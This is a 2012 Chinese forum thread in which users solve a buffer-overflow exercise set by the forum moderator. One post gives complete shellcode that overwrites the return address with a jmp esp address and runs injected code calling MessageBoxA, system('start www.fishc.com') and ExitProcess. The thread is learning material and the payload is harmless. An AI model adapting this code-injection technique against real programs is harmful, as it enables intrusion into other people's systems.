Sì曾相識♂
发表于 2012-8-9 14:39:48
竟然被人抢先了一部,想搞懂这个的,建议出看一下看雪论坛出品的书《0Day安全:软件漏洞分析技术》。甲鱼兄,我说的没错把,嘿嘿~
五月跳回家
发表于 2012-8-9 14:52:06
小甲鱼 发表于 2012-8-8 22:49 static/image/common/back.gif
算算难度好像没那么大,所以改200鱼币~
200鱼币这活动还有么,我写好了
小甲鱼
发表于 2012-8-9 15:04:45
五月跳回家 发表于 2012-8-9 14:52 static/image/common/back.gif
200鱼币这活动还有么,我写好了
{:5_105:}哟西,有的,把答案和具体的思路提交下即可哦~真不错~
小甲鱼
发表于 2012-8-9 15:05:10
Sì曾相識♂ 发表于 2012-8-9 14:39 static/image/common/back.gif
竟然被人抢先了一部,想搞懂这个的,建议出看一下看雪论坛出品的书《0Day安全:软件漏洞分析技术》。甲鱼兄 ...
{:5_109:}嗯嗯,多次推荐,非常不错的一本入门书籍~
By、小雨(zy)
发表于 2012-8-9 15:07:30
:lol看看:lol:lol:lol:lol
五月跳回家
发表于 2012-8-9 15:07:33
本帖最后由 五月跳回家 于 2012-8-9 15:09 编辑
小甲鱼 发表于 2012-8-9 15:04 http://bbs.fishc.com/static/image/common/back.gif
哟西,有的,把答案和具体的思路提交下即可哦~真不错~给shellcode吧
char password[]=
"a\x41\x41\x41"
"\x66\x69\x73\x68"
"\x66\x69\x73\x68"//前面填充80个字节栈
"\x12\x45\xfa\x7f"//jmp esp(原eip)
//MessageBoxA;
"\x33\xDB\x53"//xor ebx,ebx
"\x68\x63\x6F\x6D\x21"//push 216D6F63
"\x68\x73\x68\x63\x2E"
"\x68\x6F\x5F\x66\x69"
"\x68\x6D\x65\x5F\x74"
"\x68\x65\x6C\x63\x6F"//push 6F636C65
"\x68\x5E\x5F\x5E\x77"//push 775E5F5E//ascii ^_^welcome_to_fishc.com!
"\x8B\xC4"//mov eax, esp
"\x53"//push ebx
"\x50"
"\x50"//push eax
"\x53"
"\xB8\x11\xEA\x34\x75"//mov eax,0x7534EA11 ;我电脑上MessageBoxA的地址
"\xFF\xD0"//call eax
//system("start www.fishc.com");
"\x55" //push ebp
"\x8B\xEC" //mov ebp, esp
"\x83\xEC\x20" //sub esp, 20
"\xB8\x73\x74\x61\x72" //mov eax, 72617473
"\x89\x45\xE4" //mov dword ptr , eax
"\xB8\x74\x20\x77\x77" //www.fishc.com
"\x89\x45\xE8"
"\xB8\x77\x2E\x66\x69"
"\x89\x45\xEC" //....
"\xB8\x73\x68\x63\x2E" //....
"\x89\x45\xF0" //....
"\x66\xC7\x45\xF4\x63\x6F"
"\xC6\x45\xF6\x6D"
"\x33\xC0" //xor eax, eax
"\x88\x45\xF7"
"\x8D\x7D\xE4"
"\x57"
"\xBA\x77\xB1\x4C\x75" //system地址
"\xFF\xD2" //call edx ;
//ExitProcess(0);
"\x53"//push ebx
"\xB8\xE2\xBB\xAC\x75"//mov eax,75ACBBE2 ;ExitProcess
"\xFF\xD0"; //call eax;*/
向往
发表于 2012-8-9 15:31:29
{:5_100:}表示不懂
五月跳回家
发表于 2012-8-9 16:06:12
Sì曾相識♂ 发表于 2012-8-9 14:39 static/image/common/back.gif
竟然被人抢先了一部,想搞懂这个的,建议出看一下看雪论坛出品的书《0Day安全:软件漏洞分析技术》。甲鱼兄 ...
{:5_109:}昨天通宵刷的{:5_109:}
骗子死全家
发表于 2012-8-9 16:22:18
新人没那么高技术
小甲鱼
发表于 2012-8-9 16:39:23
五月跳回家 发表于 2012-8-9 16:06 static/image/common/back.gif
昨天通宵刷的
{:5_95:}看来还是酱紫的模式比较促进学习哈~
学基础
发表于 2012-8-9 16:58:39
先看看,现在还不懂
Tzdner_C
发表于 2012-8-9 17:39:49
五月跳回家 发表于 2012-8-8 22:15 static/image/common/back.gif
shellcode
可以用 GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA"); 把这个也写进文件里面,只是有些麻烦,不过就可以动态获取MessageaboxA的地址了
五月跳回家
发表于 2012-8-9 17:45:16
小甲鱼 发表于 2012-8-9 16:39 static/image/common/back.gif
看来还是酱紫的模式比较促进学习哈~
{:5_100:}甲鱼哥,我打开那网站使用system("start www.fishc.com");来的,中间有个空格,我那个纠结啊{:5_107:}
后来才想到fscanf( fp, "%s", password );来读读到空格就结束了,它就不读了,肏{:5_100:}程序崩溃,你把
fscanf( fp, "%s", password );改成fgets(password,1024,fp);吧,就当降低难度
小甲鱼
发表于 2012-8-9 17:54:19
五月跳回家 发表于 2012-8-9 17:45 static/image/common/back.gif
甲鱼哥,我打开那网站使用system("start www.fishc.com");来的,中间有个空格,我那个纠结啊{:5_ ...
{:5_104:}思路正确即可,打开网址可以用其他函数哦。
五月跳回家
发表于 2012-8-9 17:54:52
Tzdner_C 发表于 2012-8-9 17:39 static/image/common/back.gif
可以用 GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA"); 把这个也写进文件里面,只是有些麻 ...
LoadLibraryA的地址貌似也不同
蔡小小鸿
发表于 2012-8-9 18:21:30
来晚一步,这个和之前做的一模一样,应该是0day那本书上的例子吧。
好像天亮了
发表于 2012-8-9 19:20:34
看下。要求10字字字字字字字字字字字字字字
pkwangxinjun
发表于 2012-8-9 21:20:55
这个以前学习过,再来看看
Tzdner_C
发表于 2012-8-9 22:18:06
五月跳回家 发表于 2012-8-9 17:54 static/image/common/back.gif
LoadLibraryA的地址貌似也不同
:handshake疏忽了,这就成了先有鸡先有蛋的问题了。。。
没个正样
发表于 2012-8-10 03:36:58
此题目是够标新立异的,但是在缓冲区溢出实际应用中可没有这么简单!